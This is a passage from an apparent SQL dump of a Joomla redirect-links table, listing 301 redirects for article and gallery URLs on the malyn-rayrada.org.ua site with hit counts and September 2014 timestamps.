00:00:00',301),(913,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&Itemid=14&lang=en','','','',11,0,'2014-09-17 00:29:24','0000-00-00 00:00:00',301),(914,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57&Itemid=98&lang=uk','','','',15,0,'2014-09-17 00:30:30','0000-00-00 00:00:00',301),(915,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-17 00:31:49','0000-00-00 00:00:00',301),(916,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-17 00:32:15','0000-00-00 00:00:00',301),(917,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51&Itemid=92&lang=uk','','','',5,0,'2014-09-17 00:36:06','0000-00-00 00:00:00',301),(918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47:-21022013-&Itemid=86&lang=ru','','','',8,0,'2014-09-17 00:37:02','0000-00-00 00:00:00',301),(919,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56:--03022014-&Itemid=97&lang=en','','','',18,0,'2014-09-17 00:38:33','0000-00-00 00:00:00',301),(920,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-17 00:38:52','0000-00-00 00:00:00',301),(921,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-17 00:39:32','0000-00-00 00:00:00',301),(922,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',7,0,'2014-09-17 00:40:24','0000-00-00 00:00:00',301),(923,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&Itemid=14&lang=uk','','','',15,0,'2014-09-17 00:40:36','0000-00-00 00:00:00',301),(924,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',16,0,'2014-09-17 00:40:38','0000-00-00 00:00:00',301),(925,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=876:2012-12-18-09-32-45&catid=46:--21122012&Itemid=85&lang=ru','','','',7,0,'2014-09-17 00:40:53','0000-00-00 00:00:00',301),(926,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53&Itemid=94&lang=ru','','','',12,0,'2014-09-17 00:41:35','0000-00-00 00:00:00',301),(927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1379:2014-09-01-08-47-25&catid=11&Itemid=14&lang=en','','','',17,0,'2014-09-17 00:41:51','0000-00-00 00:00:00',301),(928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-------l-r---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-17 00:43:14','0000-00-00 00:00:00',301),(929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48&Itemid=87&lang=uk','','','',12,0,'2014-09-17 00:43:19','0000-00-00 00:00:00',301),(930,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',15,0,'2014-09-17 00:44:09','0000-00-00 00:00:00',301),(931,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=uk','','','',10,0,'2014-09-17 00:44:25','0000-00-00 00:00:00',301),(932,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-17 00:45:52','0000-00-00 00:00:00',301),(933,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:-l-r&catid=53:--25102013-&Itemid=94&lang=uk','','','',16,0,'2014-09-17 00:47:41','0000-00-00 00:00:00',301),(934,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-17 00:48:23','0000-00-00 00:00:00',301),(935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53&Itemid=94&lang=ru','','','',6,0,'2014-09-17 00:49:28','0000-00-00 00:00:00',301),(936,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=36&Itemid=70&lang=ru','','','',9,0,'2014-09-17 00:50:59','0000-00-00 00:00:00',301),(937,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55:--26122013-&Itemid=96&lang=en','','','',38,0,'2014-09-17 00:51:12','0000-00-00 00:00:00',301),(938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=36&Itemid=70&lang=uk','','','',6,0,'2014-09-17 00:51:38','0000-00-00 00:00:00',301),(939,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',14,0,'2014-09-17 00:51:53','0000-00-00 00:00:00',301),(940,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-17 00:51:57','0000-00-00 00:00:00',301),(941,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:----3110&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-17 00:52:42','0000-00-00 00:00:00',301),(942,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53&Itemid=94&lang=en','','','',8,0,'2014-09-17 00:52:48','0000-00-00 00:00:00',301),(943,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=uk','','','',11,0,'2014-09-17 00:53:39','0000-00-00 00:00:00',301),(944,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-09-17 00:53:54','0000-00-00 00:00:00',301),(945,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49&Itemid=88&lang=uk','','','',25,0,'2014-09-17 00:53:56','0000-00-00 00:00:00',301),(946,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51&Itemid=92&lang=en','','','',20,0,'2014-09-17 00:54:56','0000-00-00 00:00:00',301),(947,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-17 00:55:23','0000-00-00 00:00:00',301),(948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49&Itemid=88&lang=ru','','','',18,0,'2014-09-17 00:55:42','0000-00-00 00:00:00',301),(949,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&Itemid=14&lang=ru','','','',13,0,'2014-09-17 00:56:47','0000-00-00 00:00:00',301),(950,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=867:2012-12-14-10-13-30&catid=46&Itemid=85&lang=uk','','','',6,0,'2014-09-17 00:57:00','0000-00-00 00:00:00',301),(951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-17 00:57:18','0000-00-00 00:00:00',301),(952,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-17 00:57:44','0000-00-00 00:00:00',301),(953,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=8&lang=uk','','','',7,0,'2014-09-17 01:00:02','0000-00-00 00:00:00',301),(954,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47&Itemid=86&lang=uk','','','',4,0,'2014-09-17 01:00:47','0000-00-00 00:00:00',301),(955,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11&Itemid=14&lang=uk','','','',22,0,'2014-09-17 01:12:15','0000-00-00 00:00:00',301),(956,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-17 01:32:43','0000-00-00 00:00:00',301),(957,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-17 01:34:31','0000-00-00 00:00:00',301),(958,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-17 01:53:28','0000-00-00 00:00:00',301),(959,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-17 02:09:28','0000-00-00 00:00:00',301),(960,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56:--03022014-&Itemid=97&lang=uk','','','',22,0,'2014-09-17 02:10:01','0000-00-00 00:00:00',301),(961,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58:--30042014-&Itemid=105&lang=ru','','','',8,0,'2014-09-17 02:11:02','0000-00-00 00:00:00',301),(962,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=ru&Itemid=','','','',6,0,'2014-09-17 02:11:31','0000-00-00 00:00:00',301),(963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',14,0,'2014-09-17 02:12:02','0000-00-00 00:00:00',301),(964,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:-lr-&catid=59&Itemid=107&lang=ru','','','',6,0,'2014-09-17 02:12:28','0000-00-00 00:00:00',301),(965,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=uk&Itemid=0','','','',7,0,'2014-09-17 02:12:45','0000-00-00 00:00:00',301),(966,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-17 02:13:25','0000-00-00 00:00:00',301),(967,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=ru','','','',4,0,'2014-09-17 02:14:16','0000-00-00 00:00:00',301),(968,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=59:--20062014-&Itemid=107&lang=en','','','',9,0,'2014-09-17 02:15:51','0000-00-00 00:00:00',301),(969,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=uk&Itemid=','','','',6,0,'2014-09-17 02:16:26','0000-00-00 00:00:00',301),(970,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=uk','','','',3,0,'2014-09-17 02:16:45','0000-00-00 00:00:00',301),(971,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:-l-28r&catid=59&Itemid=107&lang=ru','','','',6,0,'2014-09-17 02:17:00','0000-00-00 00:00:00',301),(972,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-17 02:19:05','0000-00-00 00:00:00',301),(973,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=en','','','',9,0,'2014-09-17 02:20:20','0000-00-00 00:00:00',301),(974,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories','','','',12,0,'2014-09-17 02:20:40','0000-00-00 00:00:00',301),(975,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=uk','','','',9,0,'2014-09-17 02:20:56','0000-00-00 00:00:00',301),(976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-17 02:23:31','0000-00-00 00:00:00',301),(977,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=4&layout=blog&Itemid=8&lang=uk','','','',2,0,'2014-09-17 02:23:35','0000-00-00 00:00:00',301),(978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&Itemid=14&lang=en','','','',16,0,'2014-09-17 02:23:39','0000-00-00 00:00:00',301),(979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',21,0,'2014-09-17 02:25:12','0000-00-00 00:00:00',301),(980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',11,0,'2014-09-17 02:25:28','0000-00-00 00:00:00',301),(981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-17 02:26:30','0000-00-00 00:00:00',301),(982,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',1,0,'2014-09-17 02:28:13','0000-00-00 00:00:00',301),(983,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',1,0,'2014-09-17 02:28:18','0000-00-00 00:00:00',301),(984,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',1,0,'2014-09-17 02:28:23','0000-00-00 00:00:00',301),(985,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47&Itemid=86&lang=ru','','','',7,0,'2014-09-17 02:28:52','0000-00-00 00:00:00',301),(986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',35,0,'2014-09-17 02:28:58','0000-00-00 00:00:00',301),(987,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-17 02:29:40','0000-00-00 00:00:00',301),(988,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',19,0,'2014-09-17 02:38:07','0000-00-00 00:00:00',301),(989,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-14052014-&catid=59:--20062014-&Itemid=107&lang=en','','','',9,0,'2014-09-17 02:38:22','0000-00-00 00:00:00',301),(990,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-17 02:38:46','0000-00-00 00:00:00',301),(991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=53&Itemid=94&lang=en','','','',10,0,'2014-09-17 02:40:27','0000-00-00 00:00:00',301),(992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-17 02:40:40','0000-00-00 00:00:00',301),(993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-17 02:42:00','0000-00-00 00:00:00',301),(994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',12,0,'2014-09-17 02:42:42','0000-00-00 00:00:00',301),(995,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&Itemid=14&lang=en','','','',15,0,'2014-09-17 02:42:47','0000-00-00 00:00:00',301),(996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49:--12042013-&Itemid=88&lang=en','','','',10,0,'2014-09-17 02:43:28','0000-00-00 00:00:00',301),(997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-17 02:43:54','0000-00-00 00:00:00',301),(998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47&Itemid=86&lang=uk','','','',6,0,'2014-09-17 02:44:07','0000-00-00 00:00:00',301),(999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',45,0,'2014-09-17 02:44:34','0000-00-00 00:00:00',301),(1000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&Itemid=14&lang=ru','','','',13,0,'2014-09-17 02:45:45','0000-00-00 00:00:00',301),(1001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',56,0,'2014-09-17 02:45:48','0000-00-00 00:00:00',301),(1002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53&Itemid=94&lang=en','','','',7,0,'2014-09-17 02:45:50','0000-00-00 00:00:00',301),(1003,'http://www.malyn-rayrada.org.ua/index.php/844-pro-sklikannja-33-pozachergovoi-sesii-rajonnoi','','','',4,0,'2014-09-17 02:45:52','0000-00-00 00:00:00',301),(1004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',13,0,'2014-09-17 02:46:06','0000-00-00 00:00:00',301),(1005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56&Itemid=97&lang=en','','','',12,0,'2014-09-17 02:46:42','0000-00-00 00:00:00',301),(1006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&Itemid=14&lang=en','','','',13,0,'2014-09-17 02:46:56','0000-00-00 00:00:00',301),(1007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47&Itemid=86&lang=en','','','',11,0,'2014-09-17 02:47:11','0000-00-00 00:00:00',301),(1008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-17 02:47:42','0000-00-00 00:00:00',301),(1009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-17 02:47:43','0000-00-00 00:00:00',301),(1010,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-17 02:48:34','0000-00-00 00:00:00',301),(1011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',26,0,'2014-09-17 02:48:35','0000-00-00 00:00:00',301),(1012,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-17 02:48:37','0000-00-00 00:00:00',301),(1013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-17 02:49:43','0000-00-00 00:00:00',301),(1014,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56&Itemid=97&lang=en','','','',11,0,'2014-09-17 02:49:46','0000-00-00 00:00:00',301),(1015,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:--------lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',14,0,'2014-09-17 02:50:31','0000-00-00 00:00:00',301),(1016,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-17 02:52:04','0000-00-00 00:00:00',301),(1017,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-17 02:52:21','0000-00-00 00:00:00',301),(1018,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=3:2010-06-05-12-50-56&layout=blog&Itemid=7&lang=en','','','',13,0,'2014-09-17 02:53:02','0000-00-00 00:00:00',301),(1019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49:--12042013-&Itemid=88&lang=en','','','',10,0,'2014-09-17 02:53:05','0000-00-00 00:00:00',301),(1020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57:--15042014-&Itemid=98&lang=en','','','',14,0,'2014-09-17 02:53:07','0000-00-00 00:00:00',301),(1021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&Itemid=14&lang=ru','','','',16,0,'2014-09-17 02:53:47','0000-00-00 00:00:00',301),(1022,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:--27----&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-17 02:53:50','0000-00-00 00:00:00',301),(1023,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:------2013-&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-17 02:53:51','0000-00-00 00:00:00',301),(1024,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53&Itemid=94&lang=en','','','',16,0,'2014-09-17 02:54:41','0000-00-00 00:00:00',301),(1025,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=53&Itemid=94&lang=en','','','',9,0,'2014-09-17 02:55:36','0000-00-00 00:00:00',301),(1026,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',11,0,'2014-09-17 02:55:51','0000-00-00 00:00:00',301),(1027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=49:--12042013-&Itemid=88&lang=en','','','',19,0,'2014-09-17 02:56:42','0000-00-00 00:00:00',301),(1028,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60:--11072014-&Itemid=108&lang=en','','','',12,0,'2014-09-17 02:57:40','0000-00-00 00:00:00',301),(1029,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54&Itemid=95&lang=en','','','',17,0,'2014-09-17 02:58:42','0000-00-00 00:00:00',301),(1030,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56:--03022014-&Itemid=97&lang=en','','','',13,0,'2014-09-17 02:58:44','0000-00-00 00:00:00',301),(1031,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=56&Itemid=97&lang=uk','','','',12,0,'2014-09-17 02:58:59','0000-00-00 00:00:00',301),(1032,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:---------------l-r&catid=36&Itemid=70&lang=uk','','','',11,0,'2014-09-17 03:00:07','0000-00-00 00:00:00',301),(1033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',28,0,'2014-09-17 03:00:20','0000-00-00 00:00:00',301),(1034,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',28,0,'2014-09-17 03:01:20','0000-00-00 00:00:00',301),(1035,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-17 03:01:22','0000-00-00 00:00:00',301),(1036,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47&Itemid=86&lang=en','','','',13,0,'2014-09-17 03:02:23','0000-00-00 00:00:00',301),(1037,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:------------2014--&catid=36&Itemid=70&lang=uk','','','',10,0,'2014-09-17 03:02:25','0000-00-00 00:00:00',301),(1038,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&Itemid=14&lang=en','','','',11,0,'2014-09-17 03:03:06','0000-00-00 00:00:00',301),(1039,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=57&Itemid=98&lang=uk','','','',20,0,'2014-09-17 03:03:10','0000-00-00 00:00:00',301),(1040,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-17 03:03:11','0000-00-00 00:00:00',301),(1041,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',22,0,'2014-09-17 03:03:13','0000-00-00 00:00:00',301),(1042,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46&Itemid=85&lang=en','','','',14,0,'2014-09-17 03:03:28','0000-00-00 00:00:00',301),(1043,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&Itemid=14&lang=uk','','','',15,0,'2014-09-17 03:05:02','0000-00-00 00:00:00',301),(1044,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-17 03:05:07','0000-00-00 00:00:00',301),(1045,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',25,0,'2014-09-17 03:06:58','0000-00-00 00:00:00',301),(1046,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-17 03:08:03','0000-00-00 00:00:00',301),(1047,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-17 03:08:06','0000-00-00 00:00:00',301),(1048,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-17 03:10:52','0000-00-00 00:00:00',301),(1049,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',34,0,'2014-09-17 03:12:06','0000-00-00 00:00:00',301),(1050,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=53&Itemid=94&lang=uk','','','',24,0,'2014-09-17 03:13:01','0000-00-00 